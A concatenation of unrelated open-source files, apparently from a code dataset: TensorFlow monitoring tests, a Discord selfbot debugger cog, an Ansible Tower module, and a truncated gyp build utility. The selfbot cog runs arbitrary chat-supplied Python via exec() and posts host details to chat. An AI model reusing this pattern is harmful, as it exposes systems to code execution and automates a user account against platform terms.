# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for monitoring."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
from tensorflow.python.eager import monitoring
from tensorflow.python.eager import test
from tensorflow.python.framework import errors
from tensorflow.python.framework import test_util
class MonitoringTest(test_util.TensorFlowTestCase):
def test_counter(self):
counter = monitoring.Counter('test/counter', 'test counter')
counter.get_cell().increase_by(1)
self.assertEqual(counter.get_cell().value(), 1)
counter.get_cell().increase_by(5)
self.assertEqual(counter.get_cell().value(), 6)
def test_multiple_counters(self):
counter1 = monitoring.Counter('test/counter1', 'test counter', 'label1')
counter1.get_cell('foo').increase_by(1)
self.assertEqual(counter1.get_cell('foo').value(), 1)
counter2 = monitoring.Counter('test/counter2', 'test counter', 'label1',
'label2')
counter2.get_cell('foo', 'bar').increase_by(5)
self.assertEqual(counter2.get_cell('foo', 'bar').value(), 5)
def test_same_counter(self):
counter1 = monitoring.Counter('test/same_counter', 'test counter') # pylint: disable=unused-variable
with self.assertRaises(errors.AlreadyExistsError):
counter2 = monitoring.Counter('test/same_counter', 'test counter') # pylint: disable=unused-variable
def test_int_gauge(self):
gauge = monitoring.IntGauge('test/gauge', 'test gauge')
gauge.get_cell().set(1)
self.assertEqual(gauge.get_cell().value(), 1)
gauge.get_cell().set(5)
self.assertEqual(gauge.get_cell().value(), 5)
gauge1 = monitoring.IntGauge('test/gauge1', 'test gauge1', 'label1')
gauge1.get_cell('foo').set(2)
self.assertEqual(gauge1.get_cell('foo').value(), 2)
def test_string_gauge(self):
gauge = monitoring.StringGauge('test/gauge', 'test gauge')
gauge.get_cell().set('left')
self.assertEqual(gauge.get_cell().value(), 'left')
gauge.get_cell().set('right')
self.assertEqual(gauge.get_cell().value(), 'right')
gauge1 = monitoring.StringGauge('test/gauge1', 'test gauge1', 'label1')
gauge1.get_cell('foo').set('start')
self.assertEqual(gauge1.get_cell('foo').value(), 'start')
def test_bool_gauge(self):
gauge = monitoring.BoolGauge('test/gauge', 'test gauge')
gauge.get_cell().set(True)
self.assertTrue(gauge.get_cell().value())
gauge.get_cell().set(False)
self.assertFalse(gauge.get_cell().value())
gauge1 = monitoring.BoolGauge('test/gauge1', 'test gauge1', 'label1')
gauge1.get_cell('foo').set(True)
self.assertTrue(gauge1.get_cell('foo').value())
def test_sampler(self):
buckets = monitoring.ExponentialBuckets(1.0, 2.0, 2)
sampler = monitoring.Sampler('test/sampler', buckets, 'test sampler')
sampler.get_cell().add(1.0)
sampler.get_cell().add(5.0)
histogram_proto = sampler.get_cell().value()
self.assertEqual(histogram_proto.min, 1.0)
self.assertEqual(histogram_proto.num, 2.0)
self.assertEqual(histogram_proto.sum, 6.0)
sampler1 = monitoring.Sampler('test/sampler1', buckets, 'test sampler',
'label1')
sampler1.get_cell('foo').add(2.0)
sampler1.get_cell('foo').add(4.0)
sampler1.get_cell('bar').add(8.0)
histogram_proto1 = sampler1.get_cell('foo').value()
self.assertEqual(histogram_proto1.max, 4.0)
self.assertEqual(histogram_proto1.num, 2.0)
self.assertEqual(histogram_proto1.sum, 6.0)
def test_context_manager(self):
counter = monitoring.Counter('test/ctxmgr', 'test context manager', 'slot')
with monitoring.MonitoredTimer(counter.get_cell('long')):
time.sleep(0.01)
with monitoring.MonitoredTimer(counter.get_cell('short')):
time.sleep(0.01)
self.assertGreater(
counter.get_cell('long').value(),
counter.get_cell('short').value())
def test_function_decorator(self):
counter = monitoring.Counter('test/funcdecorator', 'test func decorator')
@monitoring.monitored_timer(counter.get_cell())
def timed_function(seconds):
time.sleep(seconds)
timed_function(0.001)
self.assertGreater(counter.get_cell().value(), 1000)
if __name__ == '__main__':
test.main()
| apache-2.0 |
Bluscream/Discord-Selfbot | cogs/debugger.py | 1 | 17971 | import pkg_resources
import contextlib
import sys
import inspect
import os
import shutil
import glob
import math
import textwrap
from PythonGists import PythonGists
from discord.ext import commands
from io import StringIO
from traceback import format_exc
from cogs.utils.checks import *
from contextlib import redirect_stdout
# Common imports that can be used by the debugger.
import requests
import json
import gc
import datetime
import time
import traceback
import prettytable
import re
import io
import asyncio
import discord
import random
import subprocess
from bs4 import BeautifulSoup
import urllib
import psutil
'''Module for the Python interpreter as well as saving, loading, viewing, etc. the cmds/scripts run with the interpreter.'''
class Debugger:
def __init__(self, bot):
self.bot = bot
self.stream = io.StringIO()
self.channel = None
self._last_result = None
def cleanup_code(self, content):
"""Automatically removes code blocks from the code."""
# remove ```py\n```
if content.startswith('```') and content.endswith('```'):
return '\n'.join(content.split('\n')[1:-1])
# remove `foo`
return content.strip('` \n')
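# Illustrative inputs and outputs:
#
#   cleanup_code('```py\nprint(1)\n```')  ->  'print(1)'
#   cleanup_code('`x = 1`')               ->  'x = 1'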
# Executes/evaluates code.Pretty much the same as Rapptz implementation for RoboDanny with slight variations.
async def interpreter(self, env, code, ctx):
body = self.cleanup_code(code)
stdout = io.StringIO()
os.chdir(os.getcwd())
with open('%s/cogs/utils/temp.txt' % os.getcwd(), 'w') as temp:
temp.write(body)
to_compile = 'async def func():\n{}'.format(textwrap.indent(body, " "))
try:
exec(to_compile, env)
except Exception as e:
return await ctx.send('```\n{}: {}\n```'.format(e.__class__.__name__, e))
func = env['func']
try:
with redirect_stdout(stdout):
ret = await func()
except Exception as e:
value = stdout.getvalue()
await ctx.send('```\n{}{}\n```'.format(value, traceback.format_exc()))
else:
value = stdout.getvalue()
result = None
if ret is None:
if value:
result = '```\n{}\n```'.format(value)
else:
try:
result = '```\n{}\n```'.format(repr(eval(body, env)))
except:
pass
else:
self._last_result = ret
result = '```\n{}{}\n```'.format(value, ret)
if result:
if len(str(result)) > 1950:
url = PythonGists.Gist(description='Py output', content=str(result).strip("`"), name='output.txt')
result = self.bot.bot_prefix + 'Large output. Posted to Gist: %s' % url
await ctx.send(result)
else:
await ctx.send(result)
else:
await ctx.send("```\n```")
@commands.command(pass_context=True)
async def debug(self, ctx, *, option: str = None):
"""Shows useful informations to people that try to help you."""
try:
if embed_perms(ctx.message):
em = discord.Embed(color=0xad2929, title='🤖 Appu\'s Discord Selfbot Debug Info')
system = ''
if sys.platform == 'linux':
system = subprocess.run(['uname', '-a'], stdout=subprocess.PIPE).stdout.decode('utf-8').strip()
if 'ubuntu' in system.lower():
system += '\n'+subprocess.run(['lsb_release', '-a'], stdout=subprocess.PIPE).stdout.decode('utf-8').strip()
elif sys.platform == 'win32':
try: platform
except NameError: import platform
system = '%s %s (%s)'%(platform.system(), platform.version(), sys.platform)
else:
system = sys.platform
em.add_field(name='Operating System', value='%s' % system, inline=False)
try:
foo = subprocess.run(['pip', 'show', 'discord.py'], stdout=subprocess.PIPE)
_ver = re.search(r'Version: (\d+\.\d+\.\w+)', str(foo.stdout)).group(1)
except: _ver = discord.__version__
em.add_field(name='Discord.py Version', value='%s'%_ver)
em.add_field(name='PIP Version', value='%s'%pkg_resources.get_distribution('pip').version)
if os.path.exists('.git'):
try: em.add_field(name='Bot version', value='%s' % os.popen('git rev-parse --verify HEAD').read()[:7])
except: pass
em.add_field(name='Python Version', value='%s (%s)'%(sys.version,sys.api_version), inline=False)
if option and 'deps' in option.lower():
dependencies = ''
dep_file = sorted(open('%s/requirements.txt' % os.getcwd()).read().split("\n"), key=str.lower)
for dep in dep_file:
if '==' not in dep: continue
dep = dep.split('==')
cur = pkg_resources.get_distribution(dep[0]).version
if cur == dep[1]: dependencies += '\✅ %s: %s\n'%(dep[0], cur)
else: dependencies += '\❌ %s: %s / %s\n'%(dep[0], cur, dep[1])
em.add_field(name='Dependencies', value='%s' % dependencies)
cog_list = ["cogs." + os.path.splitext(f)[0] for f in [os.path.basename(f) for f in glob.glob("cogs/*.py")]]
loaded_cogs = [x.__module__.split(".")[1] for x in self.bot.cogs.values()]
unloaded_cogs = [c.split(".")[1] for c in cog_list if c.split(".")[1] not in loaded_cogs]
if option and 'cogs' in option.lower():
if len(loaded_cogs) > 0: em.add_field(name='Loaded Cogs ({})'.format(len(loaded_cogs)), value='\n'.join(sorted(loaded_cogs)), inline=True)
if len(unloaded_cogs) > 0: em.add_field(name='Unloaded Cogs ({})'.format(len(unloaded_cogs)), value='\n'.join(sorted(unloaded_cogs)), inline=True)
else: em.add_field(name='Cogs', value='{} loaded.\n{} unloaded'.format(len(loaded_cogs), len(unloaded_cogs)), inline=True)
if option and 'path' in option.lower():
paths = "\n".join(sys.path).strip()
if len(paths) > 300:
url = PythonGists.Gist(description='sys.path', content=str(paths), name='syspath.txt')
em.add_field(name='Import Paths', value=paths[:300]+' [(Show more)](%s)'%url)
else:
em.add_field(name='Import Paths', value=paths)
user = subprocess.run(['whoami'], stdout=subprocess.PIPE).stdout.decode('utf-8').strip()
if sys.platform == 'linux':
user += '@'+subprocess.run(['hostname'], stdout=subprocess.PIPE).stdout.decode('utf-8').strip()
em.set_footer(text='Generated at {:%Y-%m-%d %H:%M:%S} by {}'.format(datetime.datetime.now(), user))
try: await ctx.send(content=None, embed=em)
except discord.HTTPException as e:
await ctx.send(self.bot.bot_prefix + 'Failed to send debug embed: %s' % e)
else:
await ctx.send('No permissions to embed debug info.')
except:
await ctx.send('``` %s ```'%format_exc())
@commands.group(pass_context=True, invoke_without_command=True)
async def py(self, ctx, *, msg):
"""Python interpreter. See the wiki for more info."""
if ctx.invoked_subcommand is None:
env = {
'bot': self.bot,
'ctx': ctx,
'channel': ctx.channel,
'author': ctx.author,
'guild': ctx.guild,
'server': ctx.guild,
'message': ctx.message,
'_': self._last_result
}
env.update(globals())
await self.interpreter(env, msg, ctx)
# Save last [p]py cmd/script.
@py.command(pass_context=True)
async def save(self, ctx, *, msg):
"""Save the code you last ran. Ex: [p]py save stuff"""
msg = msg.strip()[:-4] if msg.strip().endswith('.txt') else msg.strip()
os.chdir(os.getcwd())
if not os.path.exists('%s/cogs/utils/temp.txt' % os.getcwd()):
return await ctx.send(self.bot.bot_prefix + 'Nothing to save. Run a ``>py`` cmd/script first.')
if not os.path.isdir('%s/cogs/utils/save/' % os.getcwd()):
os.makedirs('%s/cogs/utils/save/' % os.getcwd())
if os.path.exists('%s/cogs/utils/save/%s.txt' % (os.getcwd(), msg)):
await ctx.send(self.bot.bot_prefix + '``%s.txt`` already exists. Overwrite? ``y/n``.' % msg)
reply = await self.bot.wait_for('message', check=lambda m: m.author == ctx.message.author and (m.content.lower() == 'y' or m.content.lower() == 'n'))
if reply.content.lower().strip() != 'y':
return await ctx.send(self.bot.bot_prefix + 'Cancelled.')
if os.path.exists('%s/cogs/utils/save/%s.txt' % (os.getcwd(), msg)):
os.remove('%s/cogs/utils/save/%s.txt' % (os.getcwd(), msg))
try:
shutil.move('%s/cogs/utils/temp.txt' % os.getcwd(), '%s/cogs/utils/save/%s.txt' % (os.getcwd(), msg))
await ctx.send(self.bot.bot_prefix + 'Saved last run cmd/script as ``%s.txt``' % msg)
except:
await ctx.send(self.bot.bot_prefix + 'Error saving file as ``%s.txt``' % msg)
# Load a cmd/script saved with the [p]save cmd
@py.command(aliases=['start'], pass_context=True)
async def run(self, ctx, *, msg):
"""Run code that you saved with the save commmand. Ex: [p]py run stuff parameter1 parameter2"""
# Like in unix, the first parameter is the script name
parameters = msg.split()
save_file = parameters[0] # Force scope
if save_file.endswith('.txt'):
save_file = save_file[:-(len('.txt'))] # Temptation to put '.txt' in a constant increases
else:
parameters[0] += '.txt' # The script name is always full
if not os.path.exists('%s/cogs/utils/save/%s.txt' % (os.getcwd(), save_file)):
return await ctx.send(self.bot.bot_prefix + 'Could not find file ``%s.txt``' % save_file)
script = open('%s/cogs/utils/save/%s.txt' % (os.getcwd(), save_file)).read()
env = {
'bot': self.bot,
'ctx': ctx,
'channel': ctx.channel,
'author': ctx.author,
'guild': ctx.guild,
'server': ctx.guild,
'message': ctx.message,
'_': self._last_result,
'argv': parameters
}
env.update(globals())
await self.interpreter(env, script, ctx)
# List saved cmd/scripts
@py.command(aliases=['ls'], pass_context=True)
async def list(self, ctx, txt: str = None):
"""List all saved scripts. Ex: [p]py list or [p]py ls"""
try:
if txt:
numb = txt.strip()
if numb.isdigit():
numb = int(numb)
else:
await ctx.send(self.bot.bot_prefix + 'Invalid syntax. Ex: ``>py list 1``')
else:
numb = 1
filelist = glob.glob('cogs/utils/save/*.txt')
if len(filelist) == 0:
return await ctx.send(self.bot.bot_prefix + 'No saved cmd/scripts.')
filelist.sort()
msg = ''
pages = int(math.ceil(len(filelist) / 10))
if numb < 1:
numb = 1
elif numb > pages:
numb = pages
for i in range(10):
try:
msg += filelist[i + (10 * (numb-1))][16:] + '\n'
except:
break
await ctx.send(self.bot.bot_prefix + 'List of saved cmd/scripts. Page ``%s of %s`` ```%s```' % (numb, pages, msg))
except Exception as e:
await ctx.send(self.bot.bot_prefix + 'Error, something went wrong: ``%s``' % e)
# View a saved cmd/script
@py.group(aliases=['vi', 'vim'], pass_context=True)
async def view(self, ctx, *, msg: str):
"""View a saved script's contents. Ex: [p]py view stuff"""
msg = msg.strip()[:-4] if msg.strip().endswith('.txt') else msg.strip()
try:
if os.path.isfile('cogs/utils/save/%s.txt' % msg):
f = open('cogs/utils/save/%s.txt' % msg, 'r').read()
await ctx.send(self.bot.bot_prefix + 'Viewing ``%s.txt``: ```py\n%s```' % (msg, f.strip('` ')))
else:
await ctx.send(self.bot.bot_prefix + '``%s.txt`` does not exist.' % msg)
except Exception as e:
await ctx.send(self.bot.bot_prefix + 'Error, something went wrong: ``%s``' % e)
# Delete a saved cmd/script
@py.group(aliases=['rm'], pass_context=True)
async def delete(self, ctx, *, msg: str):
"""Delete a saved script. Ex: [p]py delete stuff"""
msg = msg.strip()[:-4] if msg.strip().endswith('.txt') else msg.strip()
try:
if os.path.exists('cogs/utils/save/%s.txt' % msg):
os.remove('cogs/utils/save/%s.txt' % msg)
await ctx.send(self.bot.bot_prefix + 'Deleted ``%s.txt`` from saves.' % msg)
else:
await ctx.send(self.bot.bot_prefix + '``%s.txt`` does not exist.' % msg)
except Exception as e:
await ctx.send(self.bot.bot_prefix + 'Error, something went wrong: ``%s``' % e)
@commands.command(pass_context=True)
async def load(self, ctx, *, msg):
"""Load a module."""
await ctx.message.delete()
try:
if os.path.exists("custom_cogs/{}.py".format(msg)):
self.bot.load_extension("custom_cogs.{}".format(msg))
elif os.path.exists("cogs/{}.py".format(msg)):
self.bot.load_extension("cogs.{}".format(msg))
else:
raise ImportError("No module named '{}'".format(msg))
except Exception as e:
await ctx.send(self.bot.bot_prefix + 'Failed to load module: `{}.py`'.format(msg))
await ctx.send(self.bot.bot_prefix + '{}: {}'.format(type(e).__name__, e))
else:
await ctx.send(self.bot.bot_prefix + 'Loaded module: `{}.py`'.format(msg))
@commands.command(pass_context=True)
async def unload(self, ctx, *, msg):
"""Unload a module"""
await ctx.message.delete()
try:
if os.path.exists("cogs/{}.py".format(msg)):
self.bot.unload_extension("cogs.{}".format(msg))
elif os.path.exists("custom_cogs/{}.py".format(msg)):
self.bot.unload_extension("custom_cogs.{}".format(msg))
else:
raise ImportError("No module named '{}'".format(msg))
except Exception as e:
await ctx.send(self.bot.bot_prefix + 'Failed to unload module: `{}.py`'.format(msg))
await ctx.send(self.bot.bot_prefix + '{}: {}'.format(type(e).__name__, e))
else:
await ctx.send(self.bot.bot_prefix + 'Unloaded module: `{}.py`'.format(msg))
@commands.command(pass_context=True)
async def loadall(self, ctx):
"""Loads all core modules"""
await ctx.message.delete()
errors = ""
for cog in os.listdir("cogs"):
if cog.endswith(".py"):
cog = cog[:-3]
try:
self.bot.load_extension("cogs.{}".format(cog))
except Exception as e:
errors += 'Failed to load module: `{}.py` due to `{}: {}`\n'.format(cog, type(e).__name__, e)
if not errors:
await ctx.send(self.bot.bot_prefix + "All core modules loaded")
else:
await ctx.send(self.bot.bot_prefix + errors)
@commands.command(pass_context=True)
async def redirect(self, ctx):
"""Redirect STDOUT and STDERR to a channel for debugging purposes."""
sys.stdout = self.stream
sys.stderr = self.stream
self.channel = ctx.message.channel
await ctx.send(self.bot.bot_prefix + "Successfully redirected STDOUT and STDERR to the current channel!")
@commands.command(pass_context=True)
async def unredirect(self, ctx):
"""Redirect STDOUT and STDERR back to the console for debugging purposes."""
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
self.channel = None
await ctx.send(self.bot.bot_prefix + "Successfully redirected STDOUT and STDERR back to the console!")
async def redirection_clock(self):
await self.bot.wait_until_ready()
while self is self.bot.get_cog("Debugger"):
await asyncio.sleep(0.2)
stream_content = self.stream.getvalue()
if stream_content and self.channel:
await self.channel.send("```" + stream_content + "```")
self.stream = io.StringIO()
sys.stdout = self.stream
sys.stderr = self.stream
def setup(bot):
debug_cog = Debugger(bot)
loop = asyncio.get_event_loop()
loop.create_task(debug_cog.redirection_clock())
bot.add_cog(debug_cog)
| gpl-3.0 |
albertomurillo/ansible | lib/ansible/modules/web_infrastructure/ansible_tower/tower_inventory_source.py | 38 | 11320 | #!/usr/bin/python
# coding: utf-8 -*-
# Copyright: (c) 2018, Adrien Fleury <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: tower_inventory_source
author: "Adrien Fleury (@fleu42)"
version_added: "2.7"
short_description: create, update, or destroy Ansible Tower inventory source.
description:
- Create, update, or destroy Ansible Tower inventory sources. See
U(https://www.ansible.com/tower) for an overview.
options:
name:
description:
- The name to use for the inventory source.
required: True
description:
description:
- The description to use for the inventory source.
inventory:
description:
- The inventory the source is linked to.
required: True
source:
description:
- Types of inventory source.
choices:
- file
- scm
- ec2
- gce
- azure
- azure_rm
- vmware
- satellite6
- cloudforms
- openstack
- rhv
- tower
- custom
required: True
credential:
description:
- Credential to use to retrieve the inventory from.
source_vars:
description:
- >-
The source_vars allow to Override variables found in the source config
file. For example with Openstack, specifying *private: false* would
change the output of the openstack.py script. It has to be YAML or
JSON.
timeout:
description:
- Number in seconds after which the Tower API methods will time out.
source_project:
description:
- Use a *project* as a source for the *inventory*.
source_path:
description:
- Path to the file to use as a source in the selected *project*.
update_on_project_update:
description:
- >-
This parameter will sync the inventory when the project is synced. It
can only be used with an SCM source.
type: bool
source_regions:
description:
- >-
List of regions for your cloud provider. You can include multiple
regions, or all regions. Only hosts associated with the selected
regions will be updated. Refer to Ansible Tower documentation for more detail.
instance_filters:
description:
- >-
Provide a comma-separated list of filter expressions. Hosts are
imported when all of the filters match. Refer to Ansible Tower
documentation for more detail.
group_by:
description:
- >-
Specify which groups to create automatically. Group names will be
created similar to the options selected. If blank, all groups above
are created. Refer to Ansible Tower documentation for more detail.
source_script:
description:
- >-
The source custom script to use to build the inventory. It needs to
exist.
overwrite:
description:
- >-
If set, any hosts and groups that were previously present on the
external source but are now removed will be removed from the Tower
inventory. Hosts and groups that were not managed by the inventory
source will be promoted to the next manually created group or if
there is no manually created group to promote them into, they will be
left in the "all" default group for the inventory. When not checked,
local child hosts and groups not found on the external source will
remain untouched by the inventory update process.
type: bool
overwrite_vars:
description:
- >-
If set, all variables for child groups and hosts will be removed
and replaced by those found on the external source. When not checked,
a merge will be performed, combining local variables with those found
on the external source.
type: bool
update_on_launch:
description:
- >-
Each time a job runs using this inventory, refresh the inventory from
the selected source before executing job tasks.
type: bool
update_cache_timeout:
description:
- >-
Time in seconds to consider an inventory sync to be current. During
job runs and callbacks the task system will evaluate the timestamp of
the latest sync. If it is older than Cache Timeout, it is not
considered current, and a new inventory sync will be performed.
state:
description:
- Desired state of the resource.
default: "present"
choices: ["present", "absent"]
validate_certs:
description:
- Tower option to avoid certificates check.
type: bool
aliases: [ tower_verify_ssl ]
extends_documentation_fragment: tower
'''
EXAMPLES = '''
- name: Add tower inventory source
tower_inventory_source:
name: Inventory source
description: My Inventory source
inventory: My inventory
credential: Devstack_credential
source: openstack
update_on_launch: true
overwrite: true
source_vars: '{ private: false }'
state: present
validate_certs: false
'''
RETURN = ''' # '''
from ansible.module_utils.ansible_tower import TowerModule, tower_auth_config, tower_check_mode
try:
import tower_cli
import tower_cli.exceptions as exc
from tower_cli.conf import settings
except ImportError:
pass
SOURCE_CHOICES = {
'file': 'Directory or Script',
'scm': 'Sourced from a Project',
'ec2': 'Amazon EC2',
'gce': 'Google Compute Engine',
'azure': 'Microsoft Azure',
'azure_rm': 'Microsoft Azure Resource Manager',
'vmware': 'VMware vCenter',
'satellite6': 'Red Hat Satellite 6',
'cloudforms': 'Red Hat CloudForms',
'openstack': 'OpenStack',
'rhv': 'Red Hat Virtualization',
'tower': 'Ansible Tower',
'custom': 'Custom Script',
}
def main():
argument_spec = dict(
name=dict(required=True),
description=dict(required=False),
inventory=dict(required=True),
source=dict(required=True,
choices=SOURCE_CHOICES.keys()),
credential=dict(required=False),
source_vars=dict(required=False),
timeout=dict(type='int', required=False),
source_project=dict(required=False),
source_path=dict(required=False),
update_on_project_update=dict(type='bool', required=False),
source_regions=dict(required=False),
instance_filters=dict(required=False),
group_by=dict(required=False),
source_script=dict(required=False),
overwrite=dict(type='bool', required=False),
overwrite_vars=dict(type='bool', required=False),
update_on_launch=dict(type='bool', required=False),
update_cache_timeout=dict(type='int', required=False),
state=dict(choices=['present', 'absent'], default='present'),
)
module = TowerModule(argument_spec=argument_spec, supports_check_mode=True)
name = module.params.get('name')
inventory = module.params.get('inventory')
source = module.params.get('source')
state = module.params.get('state')
json_output = {'inventory_source': name, 'state': state}
tower_auth = tower_auth_config(module)
with settings.runtime_values(**tower_auth):
tower_check_mode(module)
inventory_source = tower_cli.get_resource('inventory_source')
try:
params = {}
params['name'] = name
params['source'] = source
if module.params.get('description'):
params['description'] = module.params.get('description')
if module.params.get('credential'):
credential_res = tower_cli.get_resource('credential')
try:
credential = credential_res.get(
name=module.params.get('credential'))
params['credential'] = credential['id']
except (exc.NotFound) as excinfo:
module.fail_json(
msg='Failed to update credential source,'
'credential not found: {0}'.format(excinfo),
changed=False
)
if module.params.get('source_project'):
source_project_res = tower_cli.get_resource('project')
try:
source_project = source_project_res.get(
name=module.params.get('source_project'))
params['source_project'] = source_project['id']
except (exc.NotFound) as excinfo:
module.fail_json(
msg='Failed to update source project,'
'project not found: {0}'.format(excinfo),
changed=False
)
if module.params.get('source_script'):
source_script_res = tower_cli.get_resource('inventory_script')
try:
script = source_script_res.get(
name=module.params.get('source_script'))
params['source_script'] = script['id']
except (exc.NotFound) as excinfo:
module.fail_json(
msg='Failed to update source script,'
'script not found: {0}'.format(excinfo),
changed=False
)
try:
inventory_res = tower_cli.get_resource('inventory')
params['inventory'] = inventory_res.get(name=inventory)['id']
except (exc.NotFound) as excinfo:
module.fail_json(
msg='Failed to update inventory source, '
'inventory not found: {0}'.format(excinfo),
changed=False
)
for key in ('source_vars', 'timeout', 'source_path',
'update_on_project_update', 'source_regions',
'instance_filters', 'group_by', 'overwrite',
'overwrite_vars', 'update_on_launch',
'update_cache_timeout'):
if module.params.get(key) is not None:
params[key] = module.params.get(key)
if state == 'present':
params['create_on_missing'] = True
result = inventory_source.modify(**params)
json_output['id'] = result['id']
elif state == 'absent':
params['fail_on_missing'] = False
result = inventory_source.delete(**params)
except (exc.ConnectionError, exc.BadRequest, exc.AuthError) as excinfo:
module.fail_json(msg='Failed to update inventory source: \
{0}'.format(excinfo), changed=False)
json_output['changed'] = result['changed']
module.exit_json(**json_output)
if __name__ == '__main__':
main()
| gpl-3.0 |
ahsquared/arc | arc-assets/themes/ut-thehill/node_modules/gulp-sass/node_modules/node-sass/node_modules/pangyp/gyp/pylib/gyp/MSVSUtil.py | 566 | 9386 | # Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Utility functions shared amongst the Windows generators."""
import copy
import os
_TARGET_TYPE_EXT = {
'executable': '.exe',
'loadable_module': '.dll',
'shared_library': '.dll',
}
def _GetLargePdbShimCcPath():
"""Returns the path of the large_pdb_shim.cc file."""
this_dir = os.path.abspath(os.path.dirname(__file__))
src_dir = os.path.abspath(os.path.join(this_dir, '..', '..'))
win_data_dir = os.path.join(src_dir, 'data', 'win')
large_pdb_shim_cc = os.path.join(win_data_dir, 'large-pdb-shim.cc')
return large_pdb_shim_cc
def _DeepCopySomeKeys(in_dict, keys):
"""Performs a partial deep-copy on |in_dict|, only copying the keys in |keys|.
Arguments:
in_dict: The dictionary to copy.
keys: The keys to be copied. If a key is in this list and doesn't exist in
|in_dict| this is not an error.
Returns:
The partially deep-copied dictionary.
"""
d = {}
for key in keys:
if key not in in_dict:
continue
d[key] = copy.deepcopy(in_dict[key])
return d
def _SuffixName(name, suffix):
"""Add a suffix to the end of a target.
Arguments:
name: name of the target (foo#target)
suffix: the suffix to be added
Returns:
Target name with suffix added (foo_suffix#target)
"""
parts = name.rsplit('#', 1)
parts[0] = '%s_%s' % (parts[0], suffix)
return '#'.join(parts)
def _ShardName(name, number):
"""Add a shard number to the end of a target.
Arguments:
name: name of the target (foo#target)
number: shard number
Returns:
Target name with shard added (foo_1#target)
"""
return _SuffixName(name, str(number))
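# Illustrative results:
#
#   _ShardName('foo#target', 2)  ->  'foo_2#target'
#   _SuffixName('bar', 'copy')   ->  'bar_copy'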
def ShardTargets(target_list, target_dicts):
"""Shard some targets apart to work around the linkers limits.
Arguments:
target_list: List of target pairs: 'base/base.gyp:base'.
target_dicts: Dict of target properties keyed on target pair.
Returns:
Tuple of the new sharded versions of the inputs.
"""
# Gather the targets to shard, and how many pieces.
targets_to_shard = {}
for t in target_dicts:
shards = int(target_dicts[t].get('msvs_shard', 0))
if shards:
targets_to_shard[t] = shards
# Shard target_list.
new_target_list = []
for t in target_list:
if t in targets_to_shard:
for i in range(targets_to_shard[t]):
new_target_list.append(_ShardName(t, i))
else:
new_target_list.append(t)
# Shard target_dict.
new_target_dicts = {}
for t in target_dicts:
if t in targets_to_shard:
for i in range(targets_to_shard[t]):
name = _ShardName(t, i)
new_target_dicts[name] = copy.copy(target_dicts[t])
new_target_dicts[name]['target_name'] = _ShardName(
new_target_dicts[name]['target_name'], i)
sources = new_target_dicts[name].get('sources', [])
new_sources = []
for pos in range(i, len(sources), targets_to_shard[t]):
new_sources.append(sources[pos])
new_target_dicts[name]['sources'] = new_sources
else:
new_target_dicts[t] = target_dicts[t]
# Shard dependencies.
for t in new_target_dicts:
dependencies = copy.copy(new_target_dicts[t].get('dependencies', []))
new_dependencies = []
for d in dependencies:
if d in targets_to_shard:
for i in range(targets_to_shard[d]):
new_dependencies.append(_ShardName(d, i))
else:
new_dependencies.append(d)
new_target_dicts[t]['dependencies'] = new_dependencies
return (new_target_list, new_target_dicts)
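# Sketch of the effect for a hypothetical target 'base/base.gyp:foo#target'
# with 'msvs_shard': 2 and sources [a.cc, b.cc, c.cc]:
#
#   foo_0#target gets [a.cc, c.cc]; foo_1#target gets [b.cc]
#
# Sources are dealt round-robin, and any dependency on the original target is
# rewritten to depend on every shard.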
def _GetPdbPath(target_dict, config_name, vars):
"""Returns the path to the PDB file that will be generated by a given
configuration.
The lookup proceeds as follows:
- Look for an explicit path in the VCLinkerTool configuration block.
- Look for an 'msvs_large_pdb_path' variable.
- Use '<(PRODUCT_DIR)/<(product_name).(exe|dll).pdb' if 'product_name' is
specified.
- Use '<(PRODUCT_DIR)/<(target_name).(exe|dll).pdb'.
Arguments:
target_dict: The target dictionary to be searched.
config_name: The name of the configuration of interest.
vars: A dictionary of common GYP variables with generator-specific values.
Returns:
The path of the corresponding PDB file.
"""
config = target_dict['configurations'][config_name]
msvs = config.setdefault('msvs_settings', {})
linker = msvs.get('VCLinkerTool', {})
pdb_path = linker.get('ProgramDatabaseFile')
if pdb_path:
return pdb_path
variables = target_dict.get('variables', {})
pdb_path = variables.get('msvs_large_pdb_path', None)
if pdb_path:
return pdb_path
pdb_base = target_dict.get('product_name', target_dict['target_name'])
pdb_base = '%s%s.pdb' % (pdb_base, _TARGET_TYPE_EXT[target_dict['type']])
pdb_path = vars['PRODUCT_DIR'] + '/' + pdb_base
return pdb_path
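# Fallback example (hypothetical executable target 'foo' with no explicit PDB
# settings anywhere): the final branch yields
#
#   vars['PRODUCT_DIR'] + '/foo.exe.pdb'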
def InsertLargePdbShims(target_list, target_dicts, vars):
"""Insert a shim target that forces the linker to use 4KB pagesize PDBs.
This is a workaround for targets with PDBs greater than 1GB in size, the
limit for the 1KB pagesize PDBs created by the linker by default.
Arguments:
target_list: List of target pairs: 'base/base.gyp:base'.
target_dicts: Dict of target properties keyed on target pair.
vars: A dictionary of common GYP variables with generator-specific values.
Returns:
Tuple of the shimmed version of the inputs.
"""
# Determine which targets need shimming.
targets_to_shim = []
for t in target_dicts:
target_dict = target_dicts[t]
# We only want to shim targets that have msvs_large_pdb enabled.
if not int(target_dict.get('msvs_large_pdb', 0)):
continue
# This is intended for executable, shared_library and loadable_module
# targets where every configuration is set up to produce a PDB output.
# If any of these conditions is not true then the shim logic will fail
# below.
targets_to_shim.append(t)
large_pdb_shim_cc = _GetLargePdbShimCcPath()
for t in targets_to_shim:
target_dict = target_dicts[t]
target_name = target_dict.get('target_name')
base_dict = _DeepCopySomeKeys(target_dict,
['configurations', 'default_configuration', 'toolset'])
# This is the dict for copying the source file (part of the GYP tree)
# to the intermediate directory of the project. This is necessary because
# we can't always build a relative path to the shim source file (on Windows
# GYP and the project may be on different drives), and Ninja hates absolute
# paths (it ends up generating the .obj and .obj.d alongside the source
# file, polluting GYPs tree).
copy_suffix = 'large_pdb_copy'
copy_target_name = target_name + '_' + copy_suffix
full_copy_target_name = _SuffixName(t, copy_suffix)
